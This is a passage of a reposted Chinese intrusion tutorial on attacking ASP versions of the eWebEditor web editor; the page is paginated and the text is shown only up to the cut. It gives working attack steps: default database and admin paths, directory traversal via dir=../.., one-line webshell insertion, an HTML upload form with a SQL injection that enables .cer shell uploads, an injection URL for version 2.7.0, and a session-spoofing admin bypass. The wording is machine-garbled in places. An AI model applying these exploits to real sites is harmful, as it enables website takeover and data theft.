当前位置:七道奇文章资讯安全技术网络技术
日期:2009-08-07 16:08:00  来源:本站整理

浅析asp版本ewebeditor在线编辑器[网络技术]

赞助商链接



  本文“浅析asp版本ewebeditor在线编辑器[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

Ewebeditor编辑器目前分为asp,aspx,php,jsp四种程序,各类ewebeditor版本很多,功效强盛颇收利用者爱好,在国内利用极其遍及.关于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点: 

默许,遍历目录漏洞,一句话,注入,构造,cookie拐骗,社工(踩脚迹入侵), 

NO1.ewebeditor编辑器普通默许数据库途径是db/ewebeditor.mdb  
默许的后台途径是admin_login.asp  
倡议最好检测下admin_style.asp文件能否可以直接拜候 

NO2.遍历目录漏洞(具体以下): 
登陆编辑器---上传文件管理---挑选款式目录(随便选一个目录)  
得到: 
ewebeditor/admin_uploadfile.asp?id=14 
在id=14背面增添&dir=.. 
再加 &dir=../.. 
&dir=../../../.. 看到整个网站文件了 
漏洞危害大大的,绝对可怕 

NO3.当数据库被管理员改正成asp、asa后缀的时刻,可以插一句话木马服务端进入数据库,然后一句话木马客户端衔接拿下webshell 

NO4.有的时刻爆了数据库找不到后台地址让人发急,其实可以试试查看款式表,有没别人加入的asp、asa后缀款式表,也就是虽说的踩着脚迹入侵.  
还有的时刻聪明的管理员也就是加“#”无妨社工试试,我可没少占便宜的  
比方:db/#ewebeditor.asa、db/#ewebeditor.asp 、db/#ewebeditor.mdb 

NO5.注入2.1.6的注入就不多说了,以下保存为html文件改正action,直接上传cer马 

<H1>ewebeditor asp版 2.1.6 上传漏洞操纵程序----</H1><br><br> 
<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye’ 

union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width, 

S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|cer’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_Medi 

aSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=’standard’and’a’=’a" method=post name=myform enctype="multipart/form-data"> 
<input type=file name=uploadfile size=100><br><br> 
<input type=submit value=Fuck> 
</form> 
  

  

有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞  
简单操纵就是  
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200  

默许表名:eWebEditor_System默许列名:sys_UserName、sys_UserPass,然后操纵nbsi举行猜解,对此举行注入获得账号密码 

NO6.有的时刻管理员不让复制款式,但是你又看到有个款式被别人从前入侵改正了存在asa大概之类可以传shell,但是上传插入工具没有,又无法改正怎么办那?大概很多人说应当可以加工具栏,但是我就碰见过不让加的  
这样我们可以操纵ewebeditor里的upload.asp文件举行本地构造举行上传具体以下: (略) 

NO.7还有种方法是近来坏客发现的  
操纵WebEditor session拐骗漏洞,进入后台:  
漏洞文件:Admin_Private.asp  
漏洞语句: 

<%  
If Session("eWebEditor_User") = "" Then  
Response.Redirect "admin_login.asp"  
Response.End  
End If 

只判断了session,没有判断cookies和途径的考证问题.  
漏洞操纵:  
新建一个amxking.asp内容以下: 

<%Session("eWebEditor_User") = "11111111"%> 

拜候amxking.asp,再拜候后台任何文件,for example:Admin_Default.asp 

  面对此种威胁网站

[1] [2]  下一页


  以上是“浅析asp版本ewebeditor在线编辑器[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 浅析ASP.NET的IIS映射
  • 浅析asp版本ewebeditor在线编辑器
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .